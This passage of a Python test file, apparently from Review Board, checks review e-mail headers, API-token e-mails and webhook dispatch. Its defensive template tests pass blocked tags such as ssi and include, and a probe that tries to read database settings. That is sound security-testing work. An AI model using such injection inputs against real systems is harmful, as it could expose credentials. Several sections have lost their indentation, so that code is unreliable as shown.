        """
        review_request = self.create_review_request(public=True)
        # Custom top text means this is not a "Ship It only" review, so
        # only the plain ShipIt header should be present.
        self.create_review(review_request,
                           body_top='Some general information.',
                           body_bottom='',
                           ship_it=True,
                           publish=True)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_headers_bottom_text(self):
        """Testing sending a review e-mail with a 'Ship It' and bottom text"""
        review_request = self.create_review_request(public=True)
        # Bottom text disqualifies the review from being "Ship It only".
        self.create_review(review_request,
                           body_top=Review.SHIP_IT_TEXT,
                           body_bottom='Some comments',
                           ship_it=True,
                           publish=True)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    @add_fixtures(['test_scmtools'])
    def test_review_shipit_headers_comments(self):
        """Testing sending a review e-mail with a 'Ship It' and diff comments
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository,
                                                    public=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # A diff comment without an open issue: not "Ship It only", and
        # no "Fix it, then Ship it!" text either.
        self.create_diff_comment(review, filediff)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    @add_fixtures(['test_scmtools'])
    def test_review_shipit_headers_comments_opened_issue(self):
        """Testing sending a review e-mail with a 'Ship It' and diff comments
        with opened issue
        """
        repository = self.create_repository(tool_name='Test')
        review_request = self.create_review_request(repository=repository,
                                                    public=True)
        diffset = self.create_diffset(review_request)
        filediff = self.create_filediff(diffset)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # An open issue on a Ship It review should trigger the
        # "Fix it, then Ship it!" text in the message body.
        self.create_diff_comment(review, filediff, issue_opened=True)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                        message.message().as_string())
    def test_review_shipit_headers_attachment_comments(self):
        """Testing sending a review e-mail with a 'Ship It' and file attachment
        comments
        """
        review_request = self.create_review_request(public=True)
        file_attachment = self.create_file_attachment(review_request)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # Attachment comment without an open issue: ShipIt header only.
        self.create_file_attachment_comment(review, file_attachment)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_headers_attachment_comments_opened_issue(self):
        """Testing sending a review e-mail with a 'Ship It' and file attachment
        comments with opened issue
        """
        review_request = self.create_review_request(public=True)
        file_attachment = self.create_file_attachment(review_request)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # Open issue on the attachment comment: expect the
        # "Fix it, then Ship it!" text in the body.
        self.create_file_attachment_comment(review, file_attachment,
                                            issue_opened=True)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                        message.message().as_string())
    def test_review_shipit_headers_screenshot_comments(self):
        """Testing sending a review e-mail with a 'Ship It' and screenshot
        comments
        """
        review_request = self.create_review_request(public=True)
        screenshot = self.create_screenshot(review_request)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # Screenshot comment without an open issue: ShipIt header only.
        self.create_screenshot_comment(review, screenshot)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_headers_screenshot_comments_opened_issue(self):
        """Testing sending a review e-mail with a 'Ship It' and screenshot
        comments with opened issue
        """
        review_request = self.create_review_request(public=True)
        screenshot = self.create_screenshot(review_request)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # Open issue on the screenshot comment: expect the
        # "Fix it, then Ship it!" text in the body.
        self.create_screenshot_comment(review, screenshot, issue_opened=True)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                        message.message().as_string())
    def test_review_shipit_headers_general_comments(self):
        """Testing sending a review e-mail with a 'Ship It' and general
        comments
        """
        review_request = self.create_review_request(public=True)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # General comment without an open issue: ShipIt header only.
        self.create_general_comment(review)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                         message.message().as_string())
    def test_review_shipit_headers_general_comments_opened_issue(self):
        """Testing sending a review e-mail with a 'Ship It' and general
        comments with opened issue
        """
        review_request = self.create_review_request(public=True)
        review = self.create_review(review_request,
                                    body_top=Review.SHIP_IT_TEXT,
                                    body_bottom='',
                                    ship_it=True,
                                    publish=False)
        # Open issue on the general comment: expect the
        # "Fix it, then Ship it!" text in the body.
        self.create_general_comment(review, issue_opened=True)
        review.publish()
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-ShipIt', message._headers)
        self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
        self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
                        message.message().as_string())
    def test_change_ownership_email(self):
        """Testing sending a review request e-mail when the owner is being
        changed
        """
        admin_user = User.objects.get(username='admin')
        admin_email = get_email_address_for_user(admin_user)
        review_request = self.create_review_request(public=True)
        submitter = review_request.submitter
        submitter_email = get_email_address_for_user(submitter)
        draft = ReviewRequestDraft.create(review_request)
        draft.owner = admin_user
        draft.save()
        # The original owner publishes the ownership change themselves.
        review_request.publish(submitter)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        # From is the publishing user; both old and new owners are notified.
        self.assertEqual(message.extra_headers['From'], submitter_email)
        self.assertSetEqual(set(message.to),
                            {admin_email, submitter_email})
    def test_change_ownership_email_not_submitter(self):
        """Testing sending a review request e-mail when the owner is being
        changed by someone else
        """
        admin_user = User.objects.get(username='admin')
        admin_email = get_email_address_for_user(admin_user)
        review_request = self.create_review_request(public=True)
        submitter = review_request.submitter
        submitter_email = get_email_address_for_user(submitter)
        draft = ReviewRequestDraft.create(review_request)
        draft.owner = admin_user
        draft.save()
        # The new owner (not the original submitter) publishes the change.
        review_request.publish(admin_user)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        # From reflects the publishing user; both owners are notified.
        self.assertEqual(message.extra_headers['From'], admin_email)
        self.assertSetEqual(set(message.to),
                            {admin_email, submitter_email})
def _get_sender(self, user):
return build_email_address(user.get_full_name(), self.sender)
class WebAPITokenEmailTests(EmailTestHelper, TestCase):
    """Unit tests for WebAPIToken creation e-mails."""

    def setUp(self):
        """Set up a user and disable new-user e-mail to keep the outbox clean.
        """
        super(WebAPITokenEmailTests, self).setUp()
        # Disable new-user notifications so that creating the test user
        # below doesn't put anything in the outbox.
        siteconfig = SiteConfiguration.objects.get_current()
        siteconfig.set('mail_send_new_user_mail', False)
        siteconfig.save()
        load_site_config()
        self.user = User.objects.create(username='test-user',
                                        first_name='Sample',
                                        last_name='User',
                                        email='test-user@example.com')
        self.assertEqual(len(mail.outbox), 0)

    def test_create_token(self):
        """Testing sending e-mail when a new API Token is created"""
        webapi_token = WebAPIToken.objects.generate_token(user=self.user,
                                                          note='Test',
                                                          policy={})
        self.assertEqual(len(mail.outbox), 1)
        email = mail.outbox[0]
        html_body = email.alternatives[0][0]
        partial_token = '%s...' % webapi_token.token[:10]
        self.assertEqual(email.subject, 'New Review Board API token created')
        self.assertEqual(email.from_email, self.sender)
        self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
        self.assertEqual(email.to[0],
                         build_email_address(self.user.get_full_name(),
                                             self.user.email))
        # Only a truncated form of the token may appear in the e-mail.
        self.assertNotIn(webapi_token.token, email.body)
        self.assertNotIn(webapi_token.token, html_body)
        self.assertIn(partial_token, email.body)
        self.assertIn(partial_token, html_body)
        self.assertIn('A new API token has been added', email.body)
        self.assertIn('A new API token has been added', html_body)

    def test_update_token(self):
        """Testing sending e-mail when an existing API Token is updated"""
        webapi_token = WebAPIToken.objects.generate_token(user=self.user,
                                                          note='Test',
                                                          policy={})
        # Clear the creation e-mail so only the update e-mail is checked.
        mail.outbox = []
        webapi_token.save()
        self.assertEqual(len(mail.outbox), 1)
        email = mail.outbox[0]
        html_body = email.alternatives[0][0]
        partial_token = '%s...' % webapi_token.token[:10]
        self.assertEqual(email.subject, 'Review Board API token updated')
        self.assertEqual(email.from_email, self.sender)
        self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
        self.assertEqual(email.to[0],
                         build_email_address(self.user.get_full_name(),
                                             self.user.email))
        # As with creation, only the truncated token may appear.
        self.assertNotIn(webapi_token.token, email.body)
        self.assertNotIn(webapi_token.token, html_body)
        self.assertIn(partial_token, email.body)
        self.assertIn(partial_token, html_body)
        self.assertIn('One of your API tokens has been updated', email.body)
        self.assertIn('One of your API tokens has been updated', html_body)

    def test_delete_token(self):
        """Testing sending e-mail when an existing API Token is deleted"""
        webapi_token = WebAPIToken.objects.generate_token(user=self.user,
                                                          note='Test',
                                                          policy={})
        # Clear the creation e-mail so only the deletion e-mail is checked.
        mail.outbox = []
        webapi_token.delete()
        self.assertEqual(len(mail.outbox), 1)
        email = mail.outbox[0]
        html_body = email.alternatives[0][0]
        self.assertEqual(email.subject, 'Review Board API token deleted')
        self.assertEqual(email.from_email, self.sender)
        self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
        self.assertEqual(email.to[0],
                         build_email_address(self.user.get_full_name(),
                                             self.user.email))
        # The deletion e-mail may include the full token, since it's gone.
        self.assertIn(webapi_token.token, email.body)
        self.assertIn(webapi_token.token, html_body)
        self.assertIn('One of your API tokens has been deleted', email.body)
        self.assertIn('One of your API tokens has been deleted', html_body)
class WebHookPayloadTests(SpyAgency, TestCase):
    """Tests for payload rendering."""

    ENDPOINT_URL = 'http://example.com/endpoint/'

    @add_fixtures(['test_scmtools', 'test_users'])
    def test_diffset_rendered(self):
        """Testing JSON-serializability of DiffSets in WebHook payloads"""
        # Spy on urlopen so no real HTTP requests are made; a raised
        # serialization error would prevent the call from happening.
        self.spy_on(urlopen, call_original=False)
        WebHookTarget.objects.create(url=self.ENDPOINT_URL,
                                     events='review_request_published')
        review_request = self.create_review_request(create_repository=True)
        self.create_diffset(review_request)
        review_request.publish(review_request.submitter)
        self.assertTrue(urlopen.spy.called)
        # Publishing a second diffset (via a draft) must dispatch again.
        self.create_diffset(review_request, draft=True)
        review_request.publish(review_request.submitter)
        self.assertEqual(len(urlopen.spy.calls), 2)
class WebHookCustomContentTests(TestCase):
    """Unit tests for render_custom_content.

    These verify both that valid templates render with the supplied
    context and that dangerous template tags (block/debug/extends/
    include/load/ssi) are rejected with a TemplateSyntaxError.
    """

    def test_with_valid_template(self):
        """Tests render_custom_content with a valid template"""
        s = render_custom_content(
            '{% if mybool %}{{s1}}{% else %}{{s2}}{% endif %}',
            {
                'mybool': True,
                's1': 'Hi!',
                's2': 'Bye!',
            })
        self.assertEqual(s, 'Hi!')

    def test_with_blocked_block_tag(self):
        """Tests render_custom_content with blocked {% block %}"""
        with self.assertRaisesMessage(TemplateSyntaxError,
                                      "Invalid block tag: 'block'"):
            # Fixed a stray ')' that had crept into the template string;
            # the tag itself is still what triggers the error.
            render_custom_content('{% block foo %}{% endblock %}')

    def test_with_blocked_debug_tag(self):
        """Tests render_custom_content with blocked {% debug %}"""
        with self.assertRaisesMessage(TemplateSyntaxError,
                                      "Invalid block tag: 'debug'"):
            render_custom_content('{% debug %}')

    def test_with_blocked_extends_tag(self):
        """Tests render_custom_content with blocked {% extends %}"""
        with self.assertRaisesMessage(TemplateSyntaxError,
                                      "Invalid block tag: 'extends'"):
            render_custom_content('{% extends "base.html" %}')

    def test_with_blocked_include_tag(self):
        """Tests render_custom_content with blocked {% include %}"""
        with self.assertRaisesMessage(TemplateSyntaxError,
                                      "Invalid block tag: 'include'"):
            render_custom_content('{% include "base.html" %}')

    def test_with_blocked_load_tag(self):
        """Tests render_custom_content with blocked {% load %}"""
        with self.assertRaisesMessage(TemplateSyntaxError,
                                      "Invalid block tag: 'load'"):
            render_custom_content('{% load i18n %}')

    def test_with_blocked_ssi_tag(self):
        """Tests render_custom_content with blocked {% ssi %}"""
        with self.assertRaisesMessage(TemplateSyntaxError,
                                      "Invalid block tag: 'ssi'"):
            render_custom_content('{% ssi "foo.html" %}')

    def test_with_unknown_vars(self):
        """Tests render_custom_content with unknown variables"""
        # Unknown/forbidden variables must render as empty strings, never
        # leak settings values.
        s = render_custom_content('{{settings.DEBUG}};{{settings.DATABASES}}')
        self.assertEqual(s, ';')
class WebHookDispatchTests(SpyAgency, TestCase):
    """Unit tests for dispatching webhooks.

    These cover each payload encoding (custom template, form data, JSON,
    XML), HMAC signing, and error handling when rendering or delivery
    fails. urlopen is always spied on, so no real HTTP traffic occurs.
    """

    ENDPOINT_URL = 'http://example.com/endpoint/'

    def test_dispatch_custom_payload(self):
        """Test dispatch_webhook_event with custom payload"""
        custom_content = (
            '{\n'
            '{% for i in items %}'
            '    "item{{i}}": true{% if not forloop.last %},{% endif %}\n'
            '{% endfor %}'
            '}')
        handler = WebHookTarget(events='my-event',
                                url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_JSON,
                                use_custom_content=True,
                                custom_content=custom_content)
        self._test_dispatch(
            handler,
            'my-event',
            {
                'items': [1, 2, 3],
            },
            'application/json',
            ('{\n'
             '    "item1": true,\n'
             '    "item2": true,\n'
             '    "item3": true\n'
             '}'))

    def test_dispatch_form_data(self):
        """Test dispatch_webhook_event with Form Data payload"""
        handler = WebHookTarget(events='my-event',
                                url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_FORM_DATA)
        self._test_dispatch(
            handler,
            'my-event',
            {
                'items': [1, 2, 3],
            },
            'application/x-www-form-urlencoded',
            'payload=%7B%22items%22%3A+%5B1%2C+2%2C+3%5D%7D')

    def test_dispatch_json(self):
        """Test dispatch_webhook_event with JSON payload"""
        handler = WebHookTarget(events='my-event',
                                url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_JSON)
        self._test_dispatch(
            handler,
            'my-event',
            {
                'items': [1, 2, 3],
            },
            'application/json',
            '{"items": [1, 2, 3]}')

    def test_dispatch_xml(self):
        """Test dispatch_webhook_event with XML payload"""
        handler = WebHookTarget(events='my-event',
                                url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_XML)
        self._test_dispatch(
            handler,
            'my-event',
            {
                'items': [1, 2, 3],
            },
            'application/xml',
            ('<?xml version="1.0" encoding="utf-8"?>\n'
             '<rsp>\n'
             ' <items>\n'
             '  <array>\n'
             '   <item>1</item>\n'
             '   <item>2</item>\n'
             '   <item>3</item>\n'
             '  </array>\n'
             ' </items>\n'
             '</rsp>'))

    def test_dispatch_with_secret(self):
        """Test dispatch_webhook_event with HMAC secret"""
        handler = WebHookTarget(events='my-event',
                                url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_JSON,
                                secret='foobar123')
        self._test_dispatch(
            handler,
            'my-event',
            {
                'items': [1, 2, 3],
            },
            'application/json',
            '{"items": [1, 2, 3]}',
            'sha1=46f8529ef47da2291eeb475f0d0c0a6f58f88f8b')

    def test_dispatch_invalid_template(self):
        """Testing dispatch_webhook_event with an invalid template"""
        handler = WebHookTarget(events='my-event', url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_JSON,
                                use_custom_content=True,
                                custom_content=r'{% invalid_block_tag %}')
        self.spy_on(logging.exception)
        self.spy_on(urlopen, call_fake=lambda *args, **kwargs: None)
        dispatch_webhook_event(FakeHTTPRequest(None), [handler], 'my-event',
                               None)
        # A bad template must be logged, not dispatched.
        self.assertFalse(urlopen.spy.called)
        self.assertTrue(logging.exception.spy.called)
        self.assertIsInstance(logging.exception.spy.last_call.args[1],
                              TemplateSyntaxError)

    def test_dispatch_render_error(self):
        """Testing dispatch_webhook_event with an unencodable object"""
        class Unencodable(object):
            pass

        handler = WebHookTarget(events='my-event', url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_JSON)
        self.spy_on(logging.exception)
        self.spy_on(urlopen, call_fake=lambda *args, **kwargs: None)
        dispatch_webhook_event(FakeHTTPRequest(None), [handler], 'my-event', {
            'unencodable': Unencodable(),
        })
        # A serialization failure must be logged, not dispatched.
        self.assertFalse(urlopen.spy.called)
        self.assertTrue(logging.exception.spy.called)
        self.assertIsInstance(logging.exception.spy.last_call.args[1],
                              TypeError)

    def test_dispatch_cannot_open(self):
        """Testing dispatch_webhook_event with an unresolvable URL"""
        def _urlopen(*args, **kwargs):
            raise IOError('')

        handler = WebHookTarget(events='my-event', url=self.ENDPOINT_URL,
                                encoding=WebHookTarget.ENCODING_JSON)
        self.spy_on(logging.exception)
        self.spy_on(urlopen, call_fake=_urlopen)
        dispatch_webhook_event(FakeHTTPRequest(None), [handler, handler],
                               'my-event',
                               None)
        # A delivery failure on one target must not stop the other.
        self.assertEqual(len(urlopen.spy.calls), 2)
        # Bug fix: this was assertTrue(len(...), 2), where the 2 was
        # silently treated as the failure message, so the assertion could
        # never fail. It must be an equality check.
        self.assertEqual(len(logging.exception.spy.calls), 2)
        self.assertIsInstance(logging.exception.spy.calls[0].args[2], IOError)
        self.assertIsInstance(logging.exception.spy.calls[1].args[2], IOError)

    def _test_dispatch(self, handler, event, payload, expected_content_type,
                       expected_data, expected_sig_header=None):
        """Dispatch through a fake urlopen and verify the outgoing request.

        Checks the target URL, event header, content type/length, body,
        and (when expected_sig_header is given) the HMAC signature header.
        """
        def _urlopen(request):
            self.assertEqual(request.get_full_url(), self.ENDPOINT_URL)
            self.assertEqual(request.headers['X-reviewboard-event'], event)
            self.assertEqual(request.headers['Content-type'],
                             expected_content_type)
            self.assertEqual(request.data, expected_data)
            self.assertEqual(request.headers['Content-length'],
                             len(expected_data))
            if expected_sig_header:
                self.assertIn('X-hub-signature', request.headers)
                self.assertEqual(request.headers['X-hub-signature'],
                                 expected_sig_header)
            else:
                self.assertNotIn('X-hub-signature', request.headers)

        self.spy_on(urlopen, call_fake=_urlopen)
        request = FakeHTTPRequest(None)
        dispatch_webhook_event(request, [handler], event, payload)
class WebHookTargetManagerTests(TestCase):
"""Unit tests for WebHookTargetManager."""
ENDPOINT_URL = 'http://example.com/endpoint/'
    def test_for_event(self):
        """Testing WebHookTargetManager.for_event"""
        # These should not match.
        WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        WebHookTarget.objects.create(
            events='event3',
            url=self.ENDPOINT_URL,
            enabled=False,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        # These should match.
        target1 = WebHookTarget.objects.create(
            events='event2,event3',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        # '*' subscribes a target to every event.
        target2 = WebHookTarget.objects.create(
            events='*',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        targets = WebHookTarget.objects.for_event('event3')
        self.assertEqual(targets, [target1, target2])
    def test_for_event_with_local_site(self):
        """Testing WebHookTargetManager.for_event with Local Sites"""
        site = LocalSite.objects.create(name='test-site')
        # These should not match: the first is global (no Local Site),
        # the second is on the site but disabled.
        WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=False,
            local_site=site,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        # This should match.
        target = WebHookTarget.objects.create(
            events='event1,event2',
            url=self.ENDPOINT_URL,
            enabled=True,
            local_site=site,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        targets = WebHookTarget.objects.for_event('event1',
                                                  local_site_id=site.pk)
        self.assertEqual(targets, [target])
    @add_fixtures(['test_scmtools'])
    def test_for_event_with_repository(self):
        """Testing WebHookTargetManager.for_event with repository"""
        repository1 = self.create_repository()
        repository2 = self.create_repository()
        # These should not match: disabled targets, a different event,
        # and a target restricted to no repositories.
        unused_target1 = WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=False,
            apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
        unused_target1.repositories.add(repository2)
        unused_target2 = WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=False,
            apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
        unused_target2.repositories.add(repository1)
        WebHookTarget.objects.create(
            events='event3',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
        # These should match: one applies to all repositories, one is
        # explicitly tied to repository1.
        target1 = WebHookTarget.objects.create(
            events='event1,event2',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_ALL)
        target2 = WebHookTarget.objects.create(
            events='event1',
            url=self.ENDPOINT_URL,
            enabled=True,
            apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
        target2.repositories.add(repository1)
        targets = WebHookTarget.objects.for_event('event1',
                                                  repository_id=repository1.pk)
        self.assertEqual(targets, [target1, target2])
@add_fixtures(['test_scmtools'])
def test_for_event_with_no_repository(self):
"""Testing WebHookTargetManager.for_event with no repository"""
repository = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
WebHookTarget.objects.create(
events='event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
targets = WebHookTarget.objects.for_event('event1')
self.assertEqual(targets, [target1, target2])
def test_for_event_with_all_events(self):
"""Testing WebHookTargetManager.for_event with ALL_EVENTS"""
with self.assertRaisesMessage(ValueError,
'"*" is not a valid event choice'):
WebHookTarget.objects.for_event(WebHookTarget.ALL_EVENTS)
class WebHookSignalDispatchTests(SpyAgency, TestCase):
    """Unit tests for dispatching webhooks by signals.

    dispatch_webhook_event is spied upon without calling through, so these
    tests verify which target, event name, and payload would have been
    dispatched, without performing any HTTP requests.
    """

    ENDPOINT_URL = 'http://example.com/endpoint/'

    fixtures = ['test_users']

    def setUp(self):
        super(WebHookSignalDispatchTests, self).setUp()

        # Intercept all dispatching; no HTTP request is ever made.
        self.spy_on(dispatch_webhook_event, call_original=False)

    def _make_local_site(self):
        """Create and return a Local Site containing the 'doc' user."""
        local_site = LocalSite.objects.create(name='test-site')
        local_site.users.add(User.objects.get(username='doc'))

        return local_site

    def _check_dispatched(self, target, event):
        """Assert that exactly one webhook dispatch occurred.

        This checks that dispatch_webhook_event was invoked once, with the
        given target and event name, and that the payload's 'event' field
        matches.

        Returns:
            The payload passed to dispatch_webhook_event, so callers can
            make event-specific assertions on it.
        """
        spy = dispatch_webhook_event.spy
        self.assertTrue(spy.called)
        self.assertEqual(len(spy.calls), 1)

        last_call = spy.last_call
        self.assertEqual(last_call.args[1], [target])
        self.assertEqual(last_call.args[2], event)

        payload = last_call.args[3]
        self.assertEqual(payload['event'], event)

        return payload

    def _check_close_payload(self, payload, review_request, close_type):
        """Assert the common fields of a review_request_closed payload."""
        self.assertEqual(payload['closed_by']['id'],
                         review_request.submitter.pk)
        self.assertEqual(payload['close_type'], close_type)
        self.assertEqual(payload['review_request']['id'],
                         review_request.display_id)

    def test_review_request_closed_submitted(self):
        """Testing webhook dispatch from 'review_request_closed' signal
        with submitted
        """
        target = WebHookTarget.objects.create(events='review_request_closed',
                                              url=self.ENDPOINT_URL)

        review_request = self.create_review_request(publish=True)
        review_request.close(review_request.SUBMITTED)

        payload = self._check_dispatched(target, 'review_request_closed')
        self._check_close_payload(payload, review_request, 'submitted')

    def test_review_request_closed_submitted_local_site(self):
        """Testing webhook dispatch from 'review_request_closed' signal with
        submitted for a local site
        """
        local_site = self._make_local_site()
        target = WebHookTarget.objects.create(events='review_request_closed',
                                              url=self.ENDPOINT_URL,
                                              local_site=local_site)

        review_request = self.create_review_request(local_site=local_site,
                                                    publish=True)
        review_request.close(review_request.SUBMITTED)

        payload = self._check_dispatched(target, 'review_request_closed')
        self._check_close_payload(payload, review_request, 'submitted')

    def test_review_request_closed_discarded(self):
        """Testing webhook dispatch from 'review_request_closed' signal
        with discarded
        """
        target = WebHookTarget.objects.create(events='review_request_closed',
                                              url=self.ENDPOINT_URL)

        # Discarding doesn't require a published review request.
        review_request = self.create_review_request()
        review_request.close(review_request.DISCARDED)

        payload = self._check_dispatched(target, 'review_request_closed')
        self._check_close_payload(payload, review_request, 'discarded')

    def test_review_request_closed_discarded_local_site(self):
        """Testing webhook dispatch from 'review_request_closed' signal with
        discarded for a local site
        """
        local_site = self._make_local_site()
        target = WebHookTarget.objects.create(events='review_request_closed',
                                              url=self.ENDPOINT_URL,
                                              local_site=local_site)

        review_request = self.create_review_request(local_site=local_site,
                                                    publish=True)
        review_request.close(review_request.DISCARDED)

        payload = self._check_dispatched(target, 'review_request_closed')
        self._check_close_payload(payload, review_request, 'discarded')

    def test_review_request_published(self):
        """Testing webhook dispatch from 'review_request_published' signal"""
        target = WebHookTarget.objects.create(
            events='review_request_published',
            url=self.ENDPOINT_URL)

        review_request = self.create_review_request()
        review_request.publish(review_request.submitter)

        payload = self._check_dispatched(target, 'review_request_published')
        self.assertIn('is_new', payload)
        self.assertEqual(payload['review_request']['id'],
                         review_request.display_id)

    def test_review_request_published_local_site(self):
        """Testing webhook dispatch from 'review_request_published' signal for
        a local site
        """
        local_site = self._make_local_site()
        target = WebHookTarget.objects.create(
            events='review_request_published', url=self.ENDPOINT_URL,
            local_site=local_site)

        review_request = self.create_review_request(local_site=local_site)
        review_request.publish(review_request.submitter)

        payload = self._check_dispatched(target, 'review_request_published')
        self.assertIn('is_new', payload)
        self.assertEqual(payload['review_request']['id'],
                         review_request.display_id)

    def test_review_request_reopened(self):
        """Testing webhook dispatch from 'review_request_reopened' signal"""
        target = WebHookTarget.objects.create(
            events='review_request_reopened',
            url=self.ENDPOINT_URL)

        review_request = self.create_review_request(publish=True)
        review_request.close(review_request.SUBMITTED)
        review_request.reopen()

        payload = self._check_dispatched(target, 'review_request_reopened')
        self.assertEqual(payload['reopened_by']['id'],
                         review_request.submitter.pk)
        self.assertEqual(payload['review_request']['id'],
                         review_request.display_id)

    def test_review_request_reopened_local_site(self):
        """Testing webhook dispatch from 'review_request_reopened' signal
        for a local site
        """
        local_site = self._make_local_site()
        target = WebHookTarget.objects.create(events='review_request_reopened',
                                              url=self.ENDPOINT_URL,
                                              local_site=local_site)

        review_request = self.create_review_request(local_site=local_site,
                                                    publish=True)
        review_request.close(review_request.SUBMITTED)
        review_request.reopen()

